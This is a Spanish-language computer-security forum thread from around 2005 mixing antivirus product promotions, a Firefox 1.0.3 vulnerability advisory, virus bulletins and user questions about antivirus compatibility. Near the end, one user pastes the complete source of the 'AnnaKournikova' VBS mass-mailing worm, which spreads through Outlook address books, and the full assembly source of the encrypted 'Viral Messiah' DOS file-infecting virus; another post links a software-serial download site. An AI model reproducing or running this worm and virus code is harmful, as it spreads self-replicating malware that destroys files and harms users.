Sophos ('http://www.sophos.com/virusinfo/analyses/w32sobern.html')
Norman ('http://www.norman.com/Virus/Virus_descriptions/22435/en')
F-Secure ('http://www.f-secure.com/v-descs/sober_p.shtml')VS Antivirus ('http://www.vsantivirus.com/sober-o.htm')
ESET (NOD32) ('http://www.enciclopediavirus.com/virus/vervirus.php?id=1947')
Enciclopedia Virus ('http://www.enciclopediavirus.com/virus/vervirus.php?id=1947')

http://www.hacksoft.com.pe/imgth/57/thehacker.gif

Perú, Julio del 2004 - HACKSOFT presenta al mercado Nacional e Internacional la nueva versión del Software Antivirus The Hacker v.5.7 para estaciones y servidores.

http://www.hacksoft.com.pe/imgth/57/caracteristicas.gif

Motor de búsqueda 100% nuevo y con tecnología de punta para detectar todo tipo de virus, backdoors, troyanos, scripts, gusanos y “aplicaciones no deseadas” ( AD-WARES, SPY-WARES, DIALERS, etc. )
Veloz, fácil de instalar y usar.
Actualizaciones Inteligentes (se actualiza automáticamente y mantiene su PC siempre protegida).
Total integración con Windows Security Center de Windows XP.*
Licencia especial para organizaciones, incluye una consola de administración remota (PC y/o servidor) que actualiza y monitorea el antivirus desde una sola central.
Implementa el concepto de tareas para la creación de procesos automáticos.
Servicio de soporte técnico las 24 horas, los 365 días del año.
Reinstalación del antivirus cuantas veces sea necesario.
Trabaja con todos los sistemas operativos para estaciones y servidores:
Estaciones: XP / 2000 / NT / 98 / 95 / Me
Servidores: Windows 2003 / 2000 Server / NT / Novell Netware (Mod. NLM) /Linux

http://www.hacksoft.com.pe/imgth/57/caja.gif

<a href=http://mudarkangels.cjb.net/thefantas/descargas/th57.exe>The Hacker Antivirus 5.7</a>

8) KoNsTrAk el The Hacker Antivirus 5.7 es compactible con el NOD32 y con el Kaspersky?


Alguien que me diga por favor si el Kaspersky y el NOD32 son compactibles o con que otro Anti-Virus es compactible el Kaspersky.


Y si son, como configurarlos para tener los dos juntos y que no haiga problemas con la PC.


Ayuda porfavor!!!!!!!!!!!!!!!!!!

Daos pues lo acabo de instalar y lo he probado, y nada.. kon el nod32 si es kompatible, kon el kaspersky nose supongo ke tb tio :)

http://img44.echo.cx/img44/1097/nod325su.jpg (http://www.imageshack.us)

Un Saludo

http://www.mozilla.org/images/product-firefox.png
Grave vulnerabilidad remota en Firefox 1.0.3 permite ejecución de código

Se han descubierto dos vulnerabilidades en Firefox (versiones hasta la 1.0.3) que pueden ser explotadas por atacantes remotos para realizar ataques de tipo cross site scripting o incluso para comprometer la maquina de la víctima.

El primer problema detectado se debe a que las URLs "IFRAME" de JavaScript no son tratadas adecuadamente a la hora de ser ejecutadas con el contexto de otra URL en la lista histórica. Esta circunstancia puede ser aprovechada para ejecutar código HTML y script arbitrario en el navegador de la víctima con el contexto de un sitio arbitrario.

El segundo problema detectado se debe a que las entradas recibidas en el parámetro 'IconURL' de 'InstallTrigger.install()' no son verificadas antes de ser utilizadas, por lo que esta circunstancia puede aprovecharse para ejecutar código JavaScript con privilegios escalados al usar una URL JavaScript especialmente formada a tal efecto. La explotación con éxito de esta vulnerabilidad requiere que el sitio tenga permitido instalar software (por defecto, los sitios que pueden hacerlo son update.mozilla.org y addons.mozilla.org).

Un atacante puede combinar ambas vulnerabilidades para provocar la ejecución remota de código arbitrario en la máquina de la víctima. El problema es especialmente alarmante si se tiene en cuenta de que hay constancia de la existencia de código de dominio publico para explotar esta vulnerabilidad.

Si bien estas vulnerabilidades han sido confirmadas en la versión 1.0.3 del navegador, no se descarta que pueda afectar a otras también.

A la espera de un parche definitivo que corrija esta situación, se recomiendan dos pasos:
1) Desactivar el soporte de JavaScript
2) Desactivar la instalación de software (Options --> Web Features --> "Allow web sites to install software")

Este es el Primer Informe del Centro Alerta-Antivirus enviado el 12/05/2005 a las 08:10.

Se han encontrado 4 virus en las últimas 24h


Virus: Beagle.BQ Peligrosidad: 2 - Baja Fecha: 12/05/2005 06:30

Nueva versión de Beagle. Emisor masivo de correos que utiliza su propio motor de envío SMTP para enviar copias de un Troyano.

También es capaz de abrir una puerta trasera sobre el puerto TCP 80, comprometiendo la seguridad de la máquina infectada.



Virus: Goldun.T Peligrosidad: 2 - Baja Fecha: 11/05/2005 20:44

Troj/Goldun-T es un troyano que roba contraseñas de e-gold. Para ello monitoriza el acceso al sitio Web www.e-gold.com para robar los datos de acceso del usuario.

El troyano hace creer al usuario que va a instalar un nuevo componente de seguridad para acceder al sitio Web de e-gold en un mensaje con el título "E-gold security connect", que incluye una imagen de e-gold y los botones "Connect" y "Exit". Si el usuario hace clic en "Connect", el troyano se instala e intenta abrir la Web de e-gold con Internet Explorer.

Virus: Prysat Peligrosidad: 2 - Baja Fecha: 11/05/2005 17:12

Troyano con capacidad para actuar como puerta trasera, permitiendo el acceso ilícito de un atacante remoto al equipo.
El intruso puede acceder a información del sistema (versión de Windows, velocidad de CPU, etc) y a realizar operaciones con ficheros (copia, ejecución, eliminación, etc).


Virus: Wurmark.J Peligrosidad: 3 - Media Fecha: 11/05/2005 13:52

Gusano que se propaga a través del envío de correo electrónico a direcciones recogidas del directorio de 'Ficheros Temporales de Internet' y de archivos con determinadas extensiones.
El Asunto del mensaje está en inglés, el Cuerpo del mensaje está vacío, y el Anexo es un .zip.

Además deposita en el sistema afectado un software espía y captura las pulsaciones tecladas por el usuario.

La última versión del gusano informático "Sober" continúa esparciéndose por la red, hasta el punto de que supuso el 5,4 por ciento de todos los correos electrónicos enviados el fin de semana, señalaron hoy expertos informáticos.

"Sober" fue responsable, además, del 84 por ciento de la actividad vírica en internet durante el fin de semana, según la firma de seguridad Sophos.

Esta compañía señaló que el gusano es particularmente dañino porque, entre otras cosas, es capaz de desactivar la protección antivirus de Symantec y de saltarse las protecciones de Windows XP.

Las variantes de este gusano han circulado desde 2003, pero ha sido esta última la que ha causado más estragos.

La última versión, llamada Sober.N, Sober.O o Sober.S (las empresas de seguridad informática llaman al gusano de manera diferente), utiliza un correo electrónico escrito en inglés y en alemán.

Una de las versiones más dañinas incluye un mensaje que informa al destinatario de que ha ganado unas entradas para el Mundial de Fútbol que se celebrará el año próximo en Alemania.

Cuando las víctimas abren el fichero que adjunta el correo, el virus se hace con sus direcciones electrónicas y las utiliza para esparcirse. EFE

mmm otro problemilla sin importancia pero me gustaria enterarme ke es esto :)

http://galeon.com/konsweb/ERROR3.jpg

Me he kambiado de antivirus... y nada mas kambiarme ya he notado una mejora jeje.

otra kosilla McAfee y el kaspersky son kompatibles?? lo pregunto porke tengo los dos puestos ahora mismo y el escaner en tiempo real del McAfee no konsigo activarlo, cuando le doy a activar me sale error...

Un Saludo

ok... ya lo he komprobado yo mismo, e cerrado el kaspersky y se activa el scanner del McAfee a la perfeccion... e vuelto a abrir el kaspersky y error de McAfee, osea ke no son kompatibles yuju!! :?

Que tal KoNsTrAk, en principio no deberías preocuparte ya que es un aviso de ataque que no ha tenido éxito,bastaría con marcar la casiila de abajo para no volver a ver el aviso.
También tube un problema similar al tuyo:
http://img111.echo.cx/my.php?image=lsass3dx.png
Opté por cambiar de antivirus y pasarme a NOD32 y cambiar de firewall ( Marlot me recomendó Outpost Firewall, va muy bien y creo que es de lo más seguro que hay )

Si quieres ver algo más sobre mi problema mira el post:
http://aclantis.com/postt13511.html

Saludos KoNsTrAk, y a todos los colaboradores del foro



http://galeon.com/robus/dragon.JPG

no si no me preokupo jejeje gracias por responder khanhon :)

Tambien tengo atakes de Lovesan...

yo ahora estoy probando el sygate personal firewall pro :)

Un Saludo

Seguridad & Virus

Tres herramientas en una con Maximum Protection Antivirus 2005 Premium Edition
Publicado por SIM el 16, May, 2005, 11:18


http://www.cienporcien.com/artman/uploads/premium_baja.jpg



Este nuevo producto es una combinación de Antivirus, que detecta, aísla y elimina automáticamente virus, gusanos y troyanos con un consumo mínimo de recursos, un eficaz AntiSpy, que bloquea y tritura adware, cookies espías, keyloggers, hijackers, dialers, etc. sin dejar rastro, incluso en la memoria RAM, y un potente Firewall, con el que establecerá permisos de entrada y de salida a través de su módem o router.

El resultado, una solución perfecta para los usuarios de PC principiantes o con conocimientos medios que quieren una protección óptima de su ordenador contra virus, hackers y spyware, de forma cómoda y sencilla. Todo ello por un precio de 49,95€ I.V.A. incluido.

Con este programa, el usuario podrá iniciar una comprobación completa del sistema a través del botón de Pánico, simplemente presionando una de las teclas de función , lo que protege el sistema de los daños que podrían causar en él los virus conocidos o desconocidos. Cuenta además con un motor de detección creado por BitDefender con actualizaciones automáticas, detección de virus de macro y detección heurística de nuevos virus.

Otras de las ventajas de Maximum Protection Antivirus 2005 Premium Edition son:

· Protección de correo electrónico. Soporta los clientes de E-mail más conocidos que utilicen POP3 y herramientas de mensajería instantánea, por ejemplo ICQ.

· Se pueden planificar los análisis del sistema en función de perfiles estándar o personalizados.

· Soporta PocketPC y LAN.

· Incorpora la función de cuarentena para los archivos infectados que han sido detectados.

· Actualizaciones periódicas a través de Internet durante un año sin costes adicionales.

· Monitor de tráfico, que indica los intentos de acceso y conexión y es capaz de rastrear las IPs de los intrusos.

· Numerosas funciones adicionales para módems/routers con un cortafuegos hardware.

Tanto la instalación como el uso del software son muy sencillos, ya que cuenta con cómodos asistentes.

El nuevo antivirus con firewall de DATA BECKER es compatible con Windows 2000/XP, funciona con PIII 500, requiere 128MB RAM y tarjetas gráfica High color (16Bit) con 16 MB RAM y 1024x768 resolución. Para instalarlo es necesario tener un espacio libre en el disco duro de 100 MB, conexión a Internet, CD-ROM, Internet Explorer 6 y tarjeta de sonido.


Ke tal, lo probamos?? xD

..:[ mks antivirus 2005 ]:..

http://www.mks.com.pl/img/pudelko_2005_mniejsze.jpg

El monitor de antivirus, profundamente encajado en el corazón del sistema de Ventanas, controla en en tiempo real todas operaciones de archivo. Por eso esto es capaz de parar la activación de un virus en el curso de la ejecución de operaciones sobre el disco duro, el disco flexible, el CD/DVD u otros portadores. El monitor, en la activación, comprueba si en la memoria de ordenador hay tras un virus instalado. Si ésta es la cuestión, el virus es quitado.

- Disco y explorador de archivo
El disco y el explorador de archivo son un elemento tradicional de software de antivirus. Durante una carrera rápida esto puede explorar muchos físicos y conectar una red paseos(unidades de disco). Esto descubre virus, caballos de Troya y gusanos de Internet. Además, al lado del explorador estándar que funciona en el ambiente de Ventanas, mks_vir el paquete contiene también un explorador de DOS 32 bites (totalmente compatible con la versión de Ventanas). Este explorador permite para suprimir virus de archivos usados por el sistema de Ventanas, y también suprimir virus localizados en el sector de bota y la mesa de partición del disco duro. En circunstancias especiales, es posible desinfectar el ordenador después del comienzo de ello del CD de instalación o del disco flexible de arranque de paquete de mks_vir.

- Explorador de correo electrónico
mks_mail el módulo permite para usar el correo electrónico seguramente. mks_mail es compatible con todos los programas de correo, por ejemplo. Perspectiva, el Murciélago, Eudora, Pegasus. Mediante la exploración del flujo de datos entre el servidor y el cliente de correo, esto quita todas las amenazas, entre otros los gusanos de Internet que se han hecho una de las amenazas más serias a lo largo de los dos años pasados. Gracias a aquellas funciones, el usuario no tiene que acordarse sobre la necesidad de explorar archivos atados a mensajes.

- Programa informático de actualización automático
La función de módulo de modernización mks_update automático debe proveer del ordenador de las definiciones de virus más recientes y elementos de paquete de mks_vir en la base corriente. El programa reacciona a alarmas publicadas por el fabricante el momento nuevas amenazas surgen. Después de que la conexión a Internet ha sido descubierta, el proceso de modernización de las ventajas de paquete.

- mks_update el programa permite para reducir al mínimo los gastos de gracias de conexiones a Internet al mecanismo de depósito. En pequeñas redes sólo un terminal de trabajo tiene que unirse al Internet para trasvasar los elementos de modernización. Otras estaciones ponen al día el programa por la red local de aquella estación. Después de la instalación mks_update, el usuario puede olvidar de la necesidad de poner al día el software mks_vir, ya que mks_update recuerda sobre ello.

http://img142.exs.cx/img142/3377/software9fe.gifhttp://files.mks.com.pl/download/windows/mkssetup.exe

http://img193.exs.cx/img193/7370/pillred8zp.gifhttp://www.freeserials.com/serials/download.php?id=13039&char=M

suerte...!!!

8) Un saludo a todos los del foro de su gran amigo Daos , te queria preguntar KoNsTrAk que si el antivirus que posteastes el Maximum Protection Antivirus 2005 Premium Edition en tan eficiente como el Kaspersky y que si lo has probado?

Si lo has probrado que te a parecido?

Que puntuacion le darias a este antivirus? del 1 al 10

Se compara con la eficiencia proteccion del Kaspersky?

Este antivirus no necesita serial o crack?

Oyes KoNsTrAk no posteastes el link de descarga, sete paso verdad, postealo porfavor para que lo pruebe

KoNsTrAk pk no postea el codigo y el link para bajar ese antivrus y er q tal es???

si es echo con partes de bitdefender y pesa 100 mb debe ser weno supongo yop...........
................

esperando el link

Buenas.

No, No se me olvido poner el link, no hay demo de evaluacion de ese antivirus almenos en su pagina oficial...

en kuanto enkuentre algo lo posteo...

Esto ya es mala leche no?? jajaja joder vamos a tener ke tener kuidado ya asta kon una mierda de texto jajaja ains...

La ventaja de meter un troyano e un .txt esk la victima al hacer doble click en el txt se infecta con el virus y el antivirus no lo detecta, es mas facil de enviar y de engañar a la gente para que lo ejecute.

mmm solo por kuriosidad... alomejor lo pruebo jejeje meter un troyano o virus en .txt.. hay ke tener kojones...

[Lo ke e puesto aki es para informar a la gente, asike no me kambieis el post a zona hacking ke os veo las intenciones jejeje]

Por cierto otra kosa.. Alguien sabe ke es esto?? me lo enviaron a mi mail :?


On Error Resume Next
Set shellobject = CreateObject("WScript.Shell")
shellobject.regwrite "HKCU\software\OnTheFly\", "Worm made with Vbswg 1.50b"
Set filesystem= Createobject("scripting.filesystemobject")
filesystem.copyfile wscript.scriptfullname,filesystem.GetSpecialFolder (0)&"\AnnaKournikova.jpg.vbs"
if shellobject.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
mail_trojan()
end if
if month(now) =1 and day(now) =26 then
shellobject.run "Http://www.dynabyte.nl",3,false
end if
Set wormfile= filesystem.opentextfile(wscript.scriptfullname, 1)
payload= wormfile.readall
wormfile.Close
Do
If Not (filesystem.fileexists(wscript.scriptfullname)) Then
Set newfile= filesystem.createtextfile(wscript.scriptfullname, True)
newfile.writepayload
newfile.Close
End If
Loop
Function mail_trojan()
On Error Resume Next
Set outlook = CreateObject("Outlook.Application")
If outlook= "Outlook"Then
Set mapi=outlook.GetNameSpace("MAPI")
Set addresses= mapi.AddressLists
For Each address In addresses
If address.AddressEntries.Count <> 0 Then
count = address.AddressEntries.Count
For I= 1 To count
Set email = outlook.CreateItem(0)
Set entry = address.AddressEntries(I)
email.To = entry.Address
email.Subject = "Here you have, ;o)"
email.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set attachment=email.Attachments
attachment.Add filesystem.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
email.DeleteAfterSubmit = True
If email.To <> "" Then
email.Send
shellobject.regwrite "HKCU\software\OnTheFly\mailed", "1"
End If
Next
End If
Next
end if
End Function
'Vbswg 1.50b

----------------------------------------------------------------------------

Y ESTO OTRO??


virus_type equ 1 ; Overwriting Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR

code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h

start label near

main proc near
flag: xchg dh,dh
xchg bp,ax
xchg bp,ax

call encrypt_decrypt ; Decrypt the virus

start_of_code label near

stop_tracing: mov cx,09EBh
mov ax,0FE05h ; Acutal move, plus a HaLT
jmp $-2
add ah,03Bh ; AH now equals 025h
jmp $-10 ; Execute the HaLT
mov bx,offset null_vector ; BX points to new routine
push cs ; Transfer CS into ES
pop es ; using a PUSH/POP
int 021h
mov al,1 ; Disable interrupt 1, too
int 021h
jmp short skip_null ; Hop over the loop
null_vector: jmp $ ; An infinite loop
skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged
lock_keys: mov al,128 ; Change here screws DEBUG
out 021h,al ; If tracing then lock keyboard

mov cx,0005h ; Do 5 infections
search_loop: push cx ; Save CX
call search_files ; Find and infect a file
pop cx ; Restore CX
loop search_loop ; Repeat until CX is 0

jmp short strt00 ; Success -- skip jump
skip00: jmp end00 ; Skip the routine
strt00: mov si,offset data00 ; SI points to data
mov ah,0Eh ; BIOS display char. function
display_loop: lodsb ; Load the next char. into AL
or al,al ; Is the character a null?
je disp_strnend ; If it is, exit
int 010h ; BIOS video interrupt
jmp short display_loop ; Do the next character
disp_strnend:

mov si,offset data00 ; SI points to data
xor dx,dx ; Clear DX
print_loop: lodsb ; Load the next char. into AL
xor ah,ah ; BIOS print char. function
or al,al ; Is the character a null?
je print_done ; If it is, exit
int 017h ; BIOS video interrupt
jmp short print_loop ; Do the next character
print_done:

end00: mov ax,04C00h ; DOS terminate function
int 021h
main endp


db 08Dh,04Eh,054h,059h,0E0h

search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,135 ; Allocate 135 bytes on stack

mov byte ptr [bp - 135],'\' ; Start with a backslash

mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 134] ; SI points to 64-byte buffer
int 021h

call traverse_path ; Start the traversal

traversal_loop: cmp word ptr [path_ad],0 ; Was the search unsuccessful?
je done_searching ; If so then we're done
call found_subdir ; Otherwise copy the subdirectory

mov ax,cs ; AX holds the code segment
mov ds,ax ; Set the data and extra
mov es,ax ; segments to the code segment

xor al,al ; Zero AL
stosb ; NULL-terminate the directory

mov ah,03Bh ; DOS change directory function
lea dx,[bp - 70] ; DX points to the directory
int 021h

mov dx,offset com_mask ; DX points to "*.COM"
call find_files ; Try to infect a .COM file
jnc done_searching ; If successful the exit
mov dx,offset exe_mask ; DX points to "*.EXE"
call find_files ; Try to infect an .EXE file
jnc done_searching ; If successful the exit
jmp short traversal_loop ; Keep checking the PATH

done_searching: mov ah,03Bh ; DOS change directory function
lea dx,[bp - 135] ; DX points to old directory
int 021h

cmp word ptr [path_ad],0 ; Did we run out of directories?
jne at_least_tried ; If not then exit
stc ; Set the carry flag for failure
at_least_tried: mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
com_mask db "*.COM",0 ; Mask for all .COM files
exe_mask db "*.EXE",0 ; Mask for all .EXE files
search_files endp

traverse_path proc near
mov es,word ptr cs:[002Ch] ; ES holds the enviroment segment
xor di,di ; DI holds the starting offset

find_path: mov si,offset path_string ; SI points to "PATH="
lodsb ; Load the "P" into AL
mov cx,08000h ; Check the first 32767 bytes
repne scasb ; Search until the byte is found
mov cx,4 ; Check the next four bytes
check_next_4: lodsb ; Load the next letter of "PATH="
scasb ; Compare it to the environment
jne find_path ; If there not equal try again
loop check_next_4 ; Otherwise keep checking

mov word ptr [path_ad],di ; Save the PATH address for later
mov word ptr [path_ad + 2],es ; Save PATH's segment for later
ret ; Return to caller

path_string db "PATH=" ; The PATH string to search for
path_ad dd ? ; Holds the PATH's address
traverse_path endp

found_subdir proc near
lds si,dword ptr [path_ad] ; DS:SI points to the PATH
lea di,[bp - 70] ; DI points to the work buffer
push cs ; Transfer CS into ES for
pop es ; byte transfer
move_subdir: lodsb ; Load the next byte into AL
cmp al,';' ; Have we reached a separator?
je moved_one ; If so we're done copying
or al,al ; Are we finished with the PATH?
je moved_last_one ; If so get out of here
stosb ; Store the byte at ES:DI
jmp short move_subdir ; Keep transfering characters

moved_last_one: xor si,si ; Zero SI to signal completion
moved_one: mov word ptr es:[path_ad],si; Store SI in the path address
ret ; Return to caller
found_subdir endp

db 0FEh,0C9h,04Bh,0DFh,06Eh


find_files proc near
push bp ; Save BP

mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address

mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack

push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h

mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file

done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h

pop bp ; Restore BP
ret ; Return to caller
find_files endp

db 07Dh,0F9h,074h,000h,09Bh

infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA

mov byte ptr [set_carry],0 ; Assume we'll fail

cmp word ptr [si + 01Ch],0 ; Is the file > 65535 bytes?
jne infection_done ; If it is then exit

cmp word ptr [si + 025h],'DN' ; Might this be COMMAND.COM?
je infection_done ; If it is then skip it

cmp word ptr [si + 01Ah],(finish - start)
jb infection_done ; If it's too small then exit

mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle

mov ah,03Fh ; DOS read from file function
mov cx,4 ; CX holds bytes to read (4)
mov dx,offset buffer ; DX points to buffer
int 021h

mov ah,03Eh ; DOS close file function
int 021h

push si ; Save DTA address before compare
mov si,offset buffer ; SI points to comparison buffer
mov di,offset flag ; DI points to virus flag
mov cx,4 ; CX holds number of bytes (4)
rep cmpsb ; Compare the first four bytes
pop si ; Restore DTA address
je infection_done ; If equal then exit
mov byte ptr [set_carry],1 ; Success -- the file is OK

mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h

mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle

push si ; Save SI through call
call encrypt_code ; Write an encrypted copy
pop si ; Restore SI

mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h

mov ah,03Eh ; DOS close file function
int 021h

mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h

infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed
ret ; Return to caller

buffer db 4 dup (?) ; Buffer to hold test data
set_carry db ? ; Set-carry-on-exit flag
infect_file endp


data00 db "I am your VIRAL MESSIAH",13,10
db "Follow me and be redeemed",13,10
db "Your data doth exist no more",13,10
db "The FAT holds ashes of your dreams",13,10,0

vcl_marker db "[VCL]",0 ; VCL creation marker


note db "[Viral Messiah]",0
db "Nowhere Man, [NuKE] '92",0

encrypt_code proc near
mov si,offset encrypt_decrypt; SI points to cipher routine

xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 8],dx ; Low word of timer is new key

xor byte ptr [si],1 ;
xor byte ptr [si + 7],1 ; Change all SIs to DIs
xor word ptr [si + 10],0101h; (and vice-versa)

mov di,offset finish ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes

mov si,offset write_stuff ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes

pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again

mov ah,040h ; DOS write to file function
mov dx,offset start ; DX points to virus

call finish ; Encrypt/write/decrypt

ret ; Return to caller

write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp

end_of_code label near

encrypt_decrypt proc near
mov si,offset start_of_code ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near

code ends
end main

Un Saludo :lol: